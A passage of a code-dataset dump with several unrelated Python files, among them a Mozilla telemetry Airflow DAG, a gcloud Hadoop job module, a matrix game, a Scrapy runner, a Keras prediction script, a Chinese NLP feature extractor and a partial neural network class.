scalar_parent_browser_engagement_max_concurrent_window_count_max\",\n \"INT(scalar_parent_browser_engagement_unique_domains_count_max) AS scalar_parent_browser_engagement_unique_domains_count_max\",\n \"INT(timezone_offset) AS timezone_offset\",\n ],\n parent_dag_name=dag.dag_id,\n dag_name=\"clients_daily_export\",\n default_args=default_args,\n num_preemptible_workers=10),\n task_id=\"clients_daily_export\",\n executor=get_default_executor(),\n dag=dag)\n\nregister_status(clients_daily, \"Clients Daily\", \"A view of main pings with one row per client per day.\")\n\nclients_last_seen = bigquery_etl_query(\n task_id=\"clients_last_seen\",\n destination_table=\"clients_last_seen_v1\",\n project_id=\"moz-fx-data-shared-prod\",\n dataset_id=\"telemetry_derived\",\n owner=\"relud@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"relud@mozilla.com\", \"jklukas@mozilla.com\", \"pmcdermott@mozilla.com\", \"dzielaski@mozilla.com\", \"jmundi@mozilla.com\"],\n depends_on_past=True,\n start_date=datetime(2019, 4, 15),\n dag=dag)\n\nexact_mau_by_dimensions = bigquery_etl_query(\n task_id=\"exact_mau_by_dimensions\",\n destination_table=\"firefox_desktop_exact_mau28_by_dimensions_v1\",\n dataset_id=\"telemetry\",\n owner=\"relud@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"relud@mozilla.com\", \"pmcdermott@mozilla.com\", \"dzielaski@mozilla.com\", \"jmundi@mozilla.com\"],\n dag=dag)\n\nexact_mau_by_client_count_dimensions = bigquery_etl_query(\n task_id=\"exact_mau_by_client_count_dimensions\",\n project_id='moz-fx-data-shared-prod',\n destination_table=\"firefox_desktop_exact_mau28_by_client_count_dimensions_v1\",\n dataset_id=\"telemetry_derived\",\n owner=\"jklukas@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"jklukas@mozilla.com\"],\n dag=dag)\n\nsmoot_usage_desktop_v2 = bigquery_etl_query(\n task_id='smoot_usage_desktop_v2',\n project_id='moz-fx-data-shared-prod',\n destination_table='smoot_usage_desktop_v2',\n dataset_id='telemetry_derived',\n owner=\"jklukas@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"jklukas@mozilla.com\"],\n dag=dag)\n\nsmoot_usage_desktop_compressed_v2 = bigquery_etl_query(\n task_id='smoot_usage_desktop_compressed_v2',\n project_id='moz-fx-data-shared-prod',\n destination_table='smoot_usage_desktop_compressed_v2',\n dataset_id='telemetry_derived',\n owner=\"jklukas@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"jklukas@mozilla.com\"],\n dag=dag)\n\nsimpleprophet_forecasts_desktop = simpleprophet_forecast(\n task_id=\"simpleprophet_forecasts_desktop\",\n datasource=\"desktop\",\n project_id='moz-fx-data-shared-prod',\n dataset_id='telemetry_derived',\n table_id='simpleprophet_forecasts_desktop_v1',\n owner=\"jklukas@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"jklukas@mozilla.com\"],\n dag=dag)\n\ndevtools_panel_usage = bigquery_etl_query(\n task_id=\"devtools_panel_usage\",\n destination_table=\"devtools_panel_usage_v1\",\n project_id=\"moz-fx-data-shared-prod\",\n dataset_id=\"telemetry_derived\",\n owner=\"jklukas@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"jklukas@mozilla.com\"],\n start_date=datetime(2019, 11, 25),\n dag=dag)\n\n\nsubdag_args = default_args.copy()\nsubdag_args[\"retries\"] = 0\ntask_id = \"bgbb_pred_dataproc\"\nparams = get_dataproc_parameters(\"google_cloud_airflow_dataproc\")\n\nbgbb_pred_dataproc = SubDagOperator(\n task_id=task_id,\n dag=dag,\n subdag=moz_dataproc_pyspark_runner(\n parent_dag_name=dag.dag_id,\n dag_name=task_id,\n job_name=\"bgbb_pred_dataproc\",\n cluster_name=\"bgbb-pred-{{ ds_nodash }}\",\n idle_delete_ttl=\"600\",\n num_workers=10,\n worker_machine_type=\"n1-standard-8\",\n init_actions_uris=[\n \"gs://dataproc-initialization-actions/python/pip-install.sh\"\n ],\n additional_properties={\n \"spark:spark.jars\": \"gs://spark-lib/bigquery/spark-bigquery-latest.jar\"\n },\n additional_metadata={\n \"PIP_PACKAGES\": \"git+https://github.com/wcbeard/bgbb_airflow.git\"\n },\n python_driver_code=\"gs://{}/jobs/bgbb_runner.py\".format(params.artifact_bucket),\n py_args=[\n \"bgbb_pred\",\n \"--submission-date\",\n \"{{ ds }}\",\n \"--model-win\",\n \"90\",\n \"--sample-ids\",\n \"[42]\" if params.is_dev else \"[]\",\n \"--source\",\n \"bigquery\",\n \"--view-materialization-project\",\n params.project_id if params.is_dev else \"moz-fx-data-shared-prod\",\n \"--view-materialization-dataset\",\n \"analysis\",\n \"--bucket-protocol\",\n \"gs\",\n \"--param-bucket\",\n params.output_bucket,\n \"--param-prefix\",\n \"bgbb/params/v1\",\n \"--pred-bucket\",\n params.output_bucket,\n \"--pred-prefix\",\n \"bgbb/active_profiles/v1\",\n ],\n gcp_conn_id=params.conn_id,\n service_account=params.client_email,\n artifact_bucket=params.artifact_bucket,\n storage_bucket=params.storage_bucket,\n default_args=subdag_args,\n ),\n)\n\nbgbb_pred_bigquery_load = SubDagOperator(\n subdag=load_to_bigquery(\n parent_dag_name=dag.dag_id,\n dag_name=\"bgbb_pred_bigquery_load\",\n default_args=default_args,\n dataset=\"bgbb/active_profiles\",\n dataset_version=\"v1\",\n p2b_table_alias=\"active_profiles_v1\",\n bigquery_dataset=\"telemetry_derived\",\n ds_type=\"ds\",\n gke_cluster_name=\"bq-load-gke-1\",\n cluster_by=[\"sample_id\"],\n rename={\"submission_date_s3\": \"submission_date\"},\n replace=[\"SAFE_CAST(sample_id AS INT64) AS sample_id\"],\n ),\n task_id=\"bgbb_pred_bigquery_load\",\n dag=dag)\n\nsearch_clients_daily_bigquery = bigquery_etl_query(\n task_id=\"search_clients_daily_bigquery\",\n destination_table=\"search_clients_daily_v8\",\n dataset_id=\"search_derived\",\n project_id=\"moz-fx-data-shared-prod\",\n owner=\"bewu@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"bewu@mozilla.com\"],\n dag=dag)\n\nsearch_aggregates_bigquery = bigquery_etl_query(\n task_id=\"search_aggregates_bigquery\",\n destination_table=\"search_aggregates_v8\",\n dataset_id=\"search_derived\",\n project_id=\"moz-fx-data-shared-prod\",\n owner=\"bewu@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"bewu@mozilla.com\"],\n dag=dag)\n\nsearch_clients_last_seen = bigquery_etl_query(\n task_id=\"search_clients_last_seen\",\n destination_table=\"search_clients_last_seen_v1\",\n dataset_id=\"search_derived\",\n project_id=\"moz-fx-data-shared-prod\",\n depends_on_past=True,\n owner=\"frank@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"frank@mozilla.com\"],\n dag=dag)\n\nexperiments_daily_active_clients = bigquery_etl_query(\n task_id=\"experiments_daily_active_clients\",\n destination_table=\"experiments_daily_active_clients_v1\",\n dataset_id=\"telemetry_derived\",\n project_id=\"moz-fx-data-shared-prod\",\n owner=\"ssuh@mozilla.com\",\n email=[\"telemetry-alerts@mozilla.com\", \"ssuh@mozilla.com\"],\n dag=dag)\n\n\nmain_summary.set_upstream(copy_deduplicate_main_ping)\nmain_summary_export.set_upstream(main_summary)\nclients_daily.set_upstream(main_summary)\nclients_daily_export.set_upstream(clients_daily)\n\naddons.set_upstream(copy_deduplicate_main_ping)\naddon_aggregates.set_upstream(copy_deduplicate_main_ping)\n\nmain_summary_experiments.set_upstream(main_summary)\nmain_summary_experiments.set_upstream(main_summary_experiments_get_experiment_list)\n\nclients_last_seen.set_upstream(clients_daily)\nexact_mau_by_dimensions.set_upstream(clients_last_seen)\nexact_mau_by_client_count_dimensions.set_upstream(clients_last_seen)\nsmoot_usage_desktop_v2.set_upstream(clients_last_seen)\nsmoot_usage_desktop_compressed_v2.set_upstream(smoot_usage_desktop_v2)\nsimpleprophet_forecasts_desktop.set_upstream(exact_mau_by_dimensions)\ndevtools_panel_usage.set_upstream(clients_daily)\n\nbgbb_pred_dataproc.set_upstream(clients_daily)\nbgbb_pred_bigquery_load.set_upstream(bgbb_pred_dataproc)\n\nsearch_clients_daily_bigquery.set_upstream(main_summary)\nsearch_aggregates_bigquery.set_upstream(search_clients_daily_bigquery)\nsearch_clients_last_seen.set_upstream(search_clients_daily_bigquery)\n\nbq_main_events.set_upstream(copy_deduplicate_main_ping)\n\nexperiments_daily_active_clients.set_upstream(clients_daily)\n","repo_name":"emtwo/telemetry-airflow","sub_path":"dags/main_summary.py","file_name":"main_summary.py","file_ext":"py","file_size_in_byte":18248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"7"} +{"seq_id":"27767282039","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport argparse\n\nfrom apitools.base.py import encoding\n\nfrom googlecloudsdk.calliope import arg_parsers\nfrom googlecloudsdk.command_lib.dataproc.jobs import base as job_base\nfrom googlecloudsdk.command_lib.dataproc.jobs import util as job_util\n\n\nclass HadoopBase(job_base.JobBase):\n \"\"\"Common functionality between release tracks.\"\"\"\n\n @staticmethod\n def Args(parser):\n \"\"\"Parses command-line arguments specific to submitting Hadoop jobs.\"\"\"\n parser.add_argument(\n '--jars',\n type=arg_parsers.ArgList(),\n metavar='JAR',\n default=[],\n help=('Comma separated list of jar files to be provided to the MR and '\n 'driver classpaths.'))\n parser.add_argument(\n '--files',\n type=arg_parsers.ArgList(),\n metavar='FILE',\n default=[],\n help='Comma separated list of file paths to be provided to the job. '\n 'A file path can either be a path to a local file or a path '\n 'to a file already in a Cloud Storage bucket.')\n parser.add_argument(\n '--archives',\n type=arg_parsers.ArgList(),\n metavar='ARCHIVE',\n default=[],\n help=('Comma separated list of archives to be provided to the job. '\n 'must be one of the following file formats: .zip, .tar, .tar.gz, '\n 'or .tgz.'))\n parser.add_argument(\n 'job_args',\n nargs=argparse.REMAINDER,\n help='The arguments to pass to the driver.')\n parser.add_argument(\n '--properties',\n type=arg_parsers.ArgDict(),\n metavar='PROPERTY=VALUE',\n help='A list of key value pairs to configure Hadoop.')\n parser.add_argument(\n '--properties-file',\n help=job_util.PROPERTIES_FILE_HELP_TEXT)\n parser.add_argument(\n '--driver-log-levels',\n type=arg_parsers.ArgDict(),\n metavar='PACKAGE=LEVEL',\n help=('A list of package to log4j log level pairs to configure driver '\n 'logging. For example: root=FATAL,com.example=INFO'))\n\n @staticmethod\n def GetFilesByType(args):\n \"\"\"Returns a dict of files by their type (jars, archives, etc.).\"\"\"\n return {\n 'main_jar': args.main_jar,\n 'jars': args.jars,\n 'archives': args.archives,\n 'files': args.files}\n\n @staticmethod\n def ConfigureJob(messages, job, files_by_type, logging_config, args):\n \"\"\"Populates the hadoopJob member of the given job.\"\"\"\n hadoop_job = messages.HadoopJob(\n args=args.job_args or [],\n archiveUris=files_by_type['archives'],\n fileUris=files_by_type['files'],\n jarFileUris=files_by_type['jars'],\n mainClass=args.main_class,\n mainJarFileUri=files_by_type['main_jar'],\n loggingConfig=logging_config)\n\n job_properties = job_util.BuildJobProperties(\n args.properties, args.properties_file)\n if job_properties:\n # Sort properties to ensure tests comparing messages not fail on ordering.\n hadoop_job.properties = encoding.DictToAdditionalPropertyMessage(\n job_properties, messages.HadoopJob.PropertiesValue, sort_items=True)\n\n job.hadoopJob = hadoop_job\n","repo_name":"twistedpair/google-cloud-sdk","sub_path":"google-cloud-sdk/lib/googlecloudsdk/command_lib/dataproc/jobs/hadoop.py","file_name":"hadoop.py","file_ext":"py","file_size_in_byte":3254,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"7"} +{"seq_id":"70937943905","text":"import random\nimport collections\n\n\nclass Player:\n\n def __init__(self, name, probability=0.5, points=0):\n self.name = name\n self.probability = probability\n self.points = points\n\n def __str__(self):\n return self.name\n\n def __repr__(self):\n return self.name\n\n def set_probability(self, probability):\n if 0 <= probability <= 1:\n self.probability = probability\n\n def add_points(self, val):\n self.points += val\n\n def get_points(self):\n return self.points\n\n def get_probability(self):\n return self.probability\n\n\nclass MatrixGame:\n\n def __init__(self, amount_of_players, players, main_matrix, award_matrix):\n self.amount_of_players = amount_of_players\n self.players = players\n self.main_matrix = main_matrix\n self.award_matrix = award_matrix\n self.last_game_choices = []\n\n def __str__(self):\n return f'Main matrix: {self.main_matrix}\\nAward matrix: {self.award_matrix}\\nPlayers: {self.players}'\n\n def __repr__(self):\n return f'Main matrix: {self.main_matrix}\\nAward matrix: {self.award_matrix}\\nPlayers: {self.players}'\n\n def get_result(self):\n self.last_game_choices = []\n for player in self.players:\n self.last_game_choices.append(random.choices([0, 1], weights=[player.get_probability(), 1 - player.get_probability()]))\n result = self.main_matrix.copy()\n for i in range(self.amount_of_players):\n choice = self.last_game_choices[i][0]\n result = result[choice]\n return result[0]\n\n def get_winner(self, result):\n result_code = result % self.amount_of_players\n return self.players[result_code]\n\n def get_points(self):\n result = self.award_matrix.copy()\n for i in range(self.amount_of_players):\n choice = self.last_game_choices[i][0]\n result = result[choice]\n return result[0]\n\n def play(self, amount_of_games=1):\n if amount_of_games == 1:\n result = self.get_result()\n winner = self.get_winner(result)\n winner.add_points(self.get_points())\n print(f'The winner is {winner}')\n return winner\n else:\n winners = []\n for i in range(amount_of_games):\n result = self.get_result()\n winner = self.get_winner(result)\n winner.add_points(self.get_points())\n winners.append(winner)\n print(f'Statistics: {collections.Counter(winners)}')\n return winners\n\n\n'''Hard code example'''\n\nplayer1 = Player('Ivan')\nplayer1.set_probability(0.33)\nplayer2 = Player('Kyrill')\nplayer2.set_probability(0.47)\nplayer3 = Player('Naruto')\nplayer3.set_probability(0.82)\n\nplayers = [player1, player2, player3]\n\nmg1 = MatrixGame(3, players, [[[[0], [1]], [[2], [3]]],\n [[[4], [5]], [[6], [7]]]], [[[[0], [0]], [[0], [0]]],\n [[[0], [0]], [[0], [0]]]])\n\nprint(mg1)\nmg1.play()\nmg1.play(1000)\nfor player in players:\n print(f'Player: {player}\\t\\tPoints: {player.get_points()}')\nprint(players)\n\n'''CLI example'''\n\n\ndef generate_matrix_automatically(matrix, n):\n if len(matrix) == 2:\n matrix[0] = generate_matrix_automatically(matrix[0].copy(), n)\n matrix[1] = generate_matrix_automatically(matrix[1].copy(), n)\n return matrix\n else:\n return [random.randint(0, n-1)]\n\n\ndef generate_matrix_manually(matrix, n):\n if len(matrix) == 2:\n matrix[0] = generate_matrix_manually(matrix[0].copy(), n)\n matrix[1] = generate_matrix_manually(matrix[1].copy(), n)\n return matrix\n else:\n val = int(input('Enter the cell: '))\n return [val]\n\n\nn = int(input('Enter the amount of players: '))\ntemplate_matrix = [[], []]\nfor i in range(1, n):\n temp = template_matrix.copy()\n template_matrix = [temp, temp]\nprint(\"Main matrix will be generated automatically\\n\")\nmatrix = generate_matrix_automatically(template_matrix.copy(), n)\nprint(\"Enter award matrix: \")\naward_matrix = generate_matrix_manually(template_matrix.copy(), n)\nplayers = []\nfor i in range(n):\n name = input(f'Enter the name of player number {i + 1}: ')\n probability = float(input(f'Enter the probability of choosing first of two rows for player {name}: '))\n players.append(Player(name, probability))\nmg = MatrixGame(n, players, matrix, award_matrix)\nprint(mg)\nk = int(input('Enter the amount of games: '))\nmg.play(k)\nfor player in players:\n print(f'Player: {player}\\t\\tPoints: {player.get_points()}')\nprint(players)\n","repo_name":"HippoMaru/MatrixGame","sub_path":"MatrixGame.py","file_name":"MatrixGame.py","file_ext":"py","file_size_in_byte":4648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"25451006365","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 6 03:29:52 2022\n\n@author: cukel\n\nThis should be the file that actually calls scrapy\non each ticker to output results\n\"\"\"\n\nimport scrapy\nfrom scrapy.crawler import CrawlerProcess\nfrom scrapy.utils.project import get_project_settings\nfrom prdriver import PrSpider,geturls,getdatetime\nticker='ABUS'\n\ns = get_project_settings()\ns['FEED_FORMAT']='csv'\ns['FEED_URI']='tester_{0}'.format(ticker)\nprocess = CrawlerProcess(settings={\n 'FEED_FORMAT':'json',\n 'FEED_URI': 'results.json'\n })\n\nprocess.crawl('prdriver',ticker=ticker)\nprocess.start()","repo_name":"cukelarter/Stock-Market-News-Analysis","sub_path":"pr_scrapyact.py","file_name":"pr_scrapyact.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"42368373385","text":"#!/usr/bin/env python\n\n\n# this script will predict a binary classification of WMA presence/absence for a new volume rendering video. \n# Input of the model should be the pre-extracted image feature sequence.\n# Output of this script is a spreadsheet that shows per-video/per-study classification results.\n\n# To run this script, type: ./DLWMA_main_4_predict.py\n\nfrom DLWMA_util_make_result_spreadsheet import Build_Spreadsheet\nfrom keras.callbacks import TensorBoard, ModelCheckpoint, CSVLogger\nfrom DLWMA_util_models import ResearchModels\nfrom DLWMA_util_data import DataSet\nfrom DLWMA_util_make_result_spreadsheet import *\nimport argparse\nimport pandas as pd\nimport os\nimport supplement\nimport numpy as np\nimport function_list_VR as ff\ncg = supplement.Experiment() \n\n\ndef test(data_type, data_file, batch_list, model, study_name, seq_length, saved_model=None,\n class_limit=None, image_shape=None, per_patient_analysis = True):\n \n data = DataSet(\n data_file = data_file,\n validation_batch = None,\n seq_length=seq_length,\n architecture = 'InceptionV3',\n class_limit=class_limit\n )\n\n test_data = data.data\n\n # get prediction by each model\n prediction_list = []\n for i in range(0,len(batch_list)):\n rm = ResearchModels(len(data.classes), model, seq_length, 1e-5 ,1e-6,2048, saved_model[i])\n prediction_list_current_batch = []\n for sample in test_data:\n movie_id = sample['video_name']\n # get generator\n p_generator = data.predict_generator(sample, data_type,0)\n\n # predict\n predict_output = rm.model.predict_generator(generator=p_generator,steps = 1)\n if np.argmax(predict_output[0]) == 0: # abnormal = [1,0], normal = [0,1]\n prediction_list_current_batch += [1] # abnormal\n else:\n prediction_list_current_batch += [0] # normal\n \n prediction_list.append(prediction_list_current_batch)\n\n # organize the predictions into a spreadsheet\n build_sheet = Build_Spreadsheet(test_data,prediction_list,batch_list, model, study_name)\n # make per-video result spreadsheet:\n build_sheet.make_per_video_spreadsheet()\n # make per-study result spreadsheet based on per-video result sheet:\n if per_patient_analysis == True:\n per_video_file= pd.read_excel(os.path.join(cg.save_dir,'results', model+ '_' + study_name + '-testing.xlsx'))\n build_sheet.make_per_study_spreadsheet(per_video_file)\n\n \ndef main():\n data_file = os.path.join(cg.save_dir,'Patient_List/movie_list_w_classes_w_picked_timeframes_test.xlsx')\n\n # define study name\n study_name = 'trial_1'\n \n # define model architectures\n model = 'lstm'\n\n # define trained models\n # since we did 5-fold cross-validation, we have 5 models. We apply all 5 and take the majority vote.\n batch_list = [0,1,2,3,4]\n epoch_list = ['001','001','001','001','001'] # pick your epochs with highest validation accuracy\n saved_model = []\n for i in range(0,len(batch_list)):\n batch = batch_list[i]\n epoch = epoch_list[batch]\n saved_model.append(os.path.join(cg.save_dir,'models', model + '_'+study_name, 'batch_'+str(batch), model+'-batch'+str(batch)+'-'+epoch+'.hdf5'))\n \n seq_len = 4\n data_type = 'features'\n image_shape = None\n\n test(data_type, data_file,batch_list, model, study_name, seq_length = seq_len,saved_model=saved_model,\n image_shape=image_shape, class_limit=None, per_patient_analysis =True)\n\nif __name__ == '__main__':\n main()","repo_name":"ucsd-fcrl/DL_WMA_by_VR_Final_v_ZC","sub_path":"DLWMA_main_4_predict.py","file_name":"DLWMA_main_4_predict.py","file_ext":"py","file_size_in_byte":3641,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"24672329434","text":"import subprocess\nimport collections\nimport csv\nimport os\nimport re\nimport logging\nimport statistics\nimport wordfreq\nimport nltk.tree\n\nfrom nodes.helper import FileOutputNode\nfrom utils import file_utils\nimport config\n\n\nSENTENCE_TOKENS = '.。!?!?'\n\nPOS_TAGS = [\n \"AD\",\"AS\",\"BA\",\"CC\",\"CD\",\"CS\",\"DEC\",\"DEG\",\"DER\",\"DEV\",\"DT\",\"ETC\",\"FW\",\"IJ\",\n \"JJ\",\"LB\",\"LC\",\"M\",\"MSP\",\"NN\",\"NR\",\"NT\",\"OD\",\"ON\",\"P\",\"PN\",\"PU\",\"SB\",\"SP\",\n \"VA\",\"VC\",\"VE\",\"VV\",\"X\",\"XX\",\"URL\"\n]\n\n\nclass MultilangTranscript(object):\n def __init__(self, filepath, out_file, output_parse_dir, cfg_rules):\n self.filepath = filepath\n self.out_file = out_file\n self.output_parse_dir = output_parse_dir\n self.cfg_rules = cfg_rules\n\n self.features = collections.OrderedDict()\n self.pos_tags = []\n self.parse_trees = []\n\n def _ratio(self, a, b):\n \"\"\"Divide but default to 1 if denominator is zero\"\"\"\n if b == 0:\n return 1\n else:\n return a / b\n\n\n def _run_chinese_corenlp(self, filepath):\n self.corenlp_out_file = os.path.join(self.output_parse_dir, os.path.basename(filepath) + '.out')\n\n if not os.path.isfile(self.corenlp_out_file):\n # lexparser_chinese.sh [output_dir] [transcript_file]\n subprocess.call([\n os.path.join(config.path_to_stanford_cp, 'lexparser_chinese.sh'),\n self.output_parse_dir,\n filepath\n ])\n\n def _parse_corenlp_output(self):\n with open(self.corenlp_out_file) as f:\n for line in f.readlines():\n line = line[:-1]\n\n match = re.search(r'PartOfSpeech=([A-Z]+)\\]', line)\n if match:\n tag = match.group(1)\n assert(tag in POS_TAGS)\n self.pos_tags.append(tag)\n\n # Count POS tag features\n for pos_tag in POS_TAGS:\n count = 0\n for tag in self.pos_tags:\n if tag == pos_tag:\n count += 1\n self.features['pos_' + pos_tag] = count\n self.features['pos_ratio_' + pos_tag] = self._ratio(count, len(self.pos_tags))\n\n # A few special ones\n self.features['ratio_pronoun_noun'] = self._ratio(self.features['pos_PN'], (self.features['pos_PN'] + self.features['pos_NN']))\n self.features['ratio_noun_verb'] = self._ratio(self.features['pos_NN'], (self.features['pos_NN'] + self.features['pos_VV']))\n\n self.features['num_tokens'] = len(self.pos_tags)\n\n\n # Parse constituency trees\n with open(self.corenlp_out_file) as f:\n\n partial_parse_tree = ''\n for line in f.readlines():\n\n # If it starts with '(', then begin a new tree\n if line.startswith('('):\n if len(partial_parse_tree) > 0:\n try:\n parse_tree = nltk.tree.Tree.fromstring(partial_parse_tree)\n self.parse_trees.append(parse_tree)\n except:\n pass\n partial_parse_tree = ''\n\n line = line.strip()\n if line.startswith('('):\n partial_parse_tree += ' ' + line\n\n # Last parse tree\n try:\n parse_tree = nltk.tree.Tree.fromstring(partial_parse_tree)\n self.parse_trees.append(parse_tree)\n except:\n pass\n\n # Parse tree features\n tree_heights = []\n for tree in self.parse_trees:\n tree_heights.append(tree.height())\n self.features['max_tree_height'] = max(tree_heights)\n self.features['mean_tree_height'] = statistics.mean(tree_heights)\n self.features['median_tree_height'] = statistics.median(tree_heights)\n\n # Count CFG rules\n num_cfg_productions = 0\n dtree = collections.defaultdict(int)\n for tree in self.parse_trees:\n for cfg_rule in tree.productions():\n if cfg_rule.is_nonlexical():\n cfg_rule_str = str(cfg_rule).replace(' ', '_')\n dtree[cfg_rule_str] += 1\n num_cfg_productions += 1\n\n for cfg_rule in self.cfg_rules:\n self.features[cfg_rule] = dtree[cfg_rule] / num_cfg_productions\n\n\n def compute_word_frequency_norms(self):\n freqs = []\n for char in self.tokens:\n freq = wordfreq.word_frequency(char, 'zh')\n\n if freq == 0:\n continue\n\n freqs.append(freq)\n\n try:\n self.features['mean_word_frequency'] = statistics.mean(freqs)\n self.features['median_word_frequency'] = statistics.median(freqs)\n except:\n self.features['mean_word_frequency'] = 0\n self.features['median_word_frequency'] = 0\n\n\n def write_features(self, out_file, debug):\n if debug:\n for k, v in self.features.items():\n print(k, v)\n else:\n with open(out_file, 'w') as f:\n csvw = csv.writer(f)\n csvw.writerow(list(self.features.keys()))\n csvw.writerow(list(self.features.values()))\n\n def _calc_ttr(self, text):\n \"\"\"TTR = unique words / all words\"\"\"\n N = len(text)\n V = len(set(text))\n return self._ratio(V, N)\n\n\n def compute_basic_word_stats(self):\n num_sentences = len([x for x in self.tokens if x in SENTENCE_TOKENS])\n num_words = len(self.tokens) - num_sentences\n ttr = self._calc_ttr([x for x in self.tokens if x not in SENTENCE_TOKENS])\n word_lengths = [len(x) for x in self.tokens if x not in SENTENCE_TOKENS]\n\n self.features['num_sentences'] = num_sentences\n self.features['mean_words_per_sentence'] = self._ratio(num_words, num_sentences)\n self.features['ttr'] = ttr\n\n def run(self):\n if file_utils.should_run(self.filepath, self.out_file):\n self.features['FileID'] = self.filepath\n\n with open(self.filepath) as f:\n self.tokens = f.read()\n\n self.compute_basic_word_stats()\n self.compute_word_frequency_norms()\n\n self._run_chinese_corenlp(self.filepath)\n self._parse_corenlp_output()\n self.write_features(self.out_file, debug=False)\n\n\nclass ChineseLex(FileOutputNode):\n def setup(self):\n self.output_parse_dir = os.path.join(self.out_dir, \"stanford_parses\")\n with open(config.chinese_cfg_rules_path) as cfgf:\n self.cfg_rules = list(map(lambda x: x[:-1], cfgf.readlines()))\n\n def run(self, filepath):\n self.log(logging.INFO, \"Starting %s\" % (filepath))\n out_file = self.derive_new_file_path(filepath, \".csv\")\n\n transcript = MultilangTranscript(filepath, out_file, self.output_parse_dir, self.cfg_rules)\n try:\n transcript.run()\n except:\n print('Failed:', filepath)\n\n self.emit(out_file)\n","repo_name":"SPOClab-ca/COVFEFE","sub_path":"nodes/lexicosyntactic_multi.py","file_name":"lexicosyntactic_multi.py","file_ext":"py","file_size_in_byte":7031,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"7"} +{"seq_id":"31892746737","text":"import sys\narr = [int(sys.stdin.readline()) for _ in range(int(sys.stdin.readline()))]\nstack = []\nstack2 = []\na = 1\nb = 0\nflag = True\nwhile b != len(arr):\n if (stack2 and stack2[-1] == arr[b]) and arr[b] in stack2:\n stack.append('-')\n stack2.pop()\n b += 1\n elif stack2 and arr[b] in stack2 and stack2[-1] != arr[b]:\n flag = False\n break\n elif not stack2 or (stack2 and stack2[-1] != arr[b]):\n stack.append('+')\n stack2.append(a)\n a += 1\n elif stack2 and a == arr[b]:\n stack.append('+')\n stack2.append(a)\n stack.append('-')\n stack2.pop()\n a += 1\n b += 1\n\n\nif stack2 or flag == False:\n print('NO')\nelse:\n print('\\n'.join(stack[0:]))\n\n\n\n\n","repo_name":"nyeongha/algo","sub_path":"2021-01-15/백준 python3 1874번 스택 수열.py","file_name":"백준 python3 1874번 스택 수열.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"34574426568","text":"import matplotlib.pyplot as plt\nimport pandas as pd\n\n# read and plot kernel\ndata = pd.read_csv(\"kernel.csv\", sep=\";\")\nplt.plot(data.x,data.phi, label=\"lee-yang kernel\")\nplt.legend()\nplt.grid(linestyle=':')\nplt.savefig(\"kernel.png\")\nplt.gcf().clear()\n\n# read and plot results\ndata = pd.read_csv(\"results.csv\", sep=\";\")\nplt.plot(data.x,data.eps, label=\"lee-yang eps\")\nplt.plot(data.x,data.L, label=\"lee-yang L\")\nplt.gca().set_ylim([-0.1, 1])\nplt.legend()\nplt.grid(linestyle=':')\nplt.savefig(\"results.png\")\nplt.gcf().clear()\n\n# read and plot cfunc\ndata = pd.read_csv(\"cfunc.csv\", sep=\";\")\nplt.plot(data.r,data.c, label=\"lee-yang c-func\")\nplt.legend()\nplt.grid(linestyle=':')\nplt.savefig(\"cfunc.png\")\nplt.gcf().clear()\n\n","repo_name":"allefabbri/tba-solver","sub_path":"examples/ex01_leeyang/ex01_leeyang_view.py","file_name":"ex01_leeyang_view.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"34555892405","text":"import numpy as np\nfrom tools import *\nclass BPNeuralNetwork:#BP神经网络类 \n def __init__(self):#初始化 \n self.input_n = 0 \n self.hidden_n = 0 \n self.output_n = 0 \n \n \n \n def setup(self, ni, nh, no): \n #初始化输入、隐层、输出元数 \n self.input_n = ni \n self.hidden_n = nh \n self.output_n = no \n # 初始化权重矩阵 \n self.input_weights = np.mat(np.zeros((self.input_n, self.hidden_n))) \n self.output_weights = np.mat(np.zeros((self.hidden_n, self.output_n))) \n # 随机初始化权重 \n for i in range(self.input_n): \n for h in range(self.hidden_n): \n self.input_weights[i,h] = rand(-0.2, 0.2) \n for h in range(self.hidden_n): \n for o in range(self.output_n): \n self.output_weights[h,o] = rand(-2.0, 2.0) \n # 初始化偏置 \n self.input_correction = np.mat(np.zeros((1, self.hidden_n))) \n self.output_correction =np.mat(np.zeros((1, self.output_n))) \n\n def predict(self, inputs): \n #预测函数 \n self.h_in = inputs*self.input_weights\n for i in range(inputs.shape[0]):\n self.h_in[i,:]+=self.input_correction#计算隐层输入\n\n self.h_out = sigmoid(self.h_in)#计算隐层输出\n\n self.p_in = self.h_out*self.output_weights\n for i in range(self.p_in.shape[0]):\n self.p_in[i,:] += self.output_correction#计算输出层输入\n\n self.p_out = sigmoid(self.p_in)#计算输出 \n return self.p_out \n \n \n def back_propagate(self, case, label, alpha): \n \n output_out = self.predict(case) # 正向传播\n #反向传播\n self.delta_output = -np.multiply((label-output_out),sigmoid_derivative(self.p_in))#隐层与输出层的残差\n self.delta_hidden = np.multiply((self.delta_output*self.output_weights.T),sigmoid_derivative(self.h_in))#输入层与隐层的残差\n self.output_weights = self.output_weights - alpha*(self.h_out.T*self.delta_output)#更新输出权重\n self.output_correction = 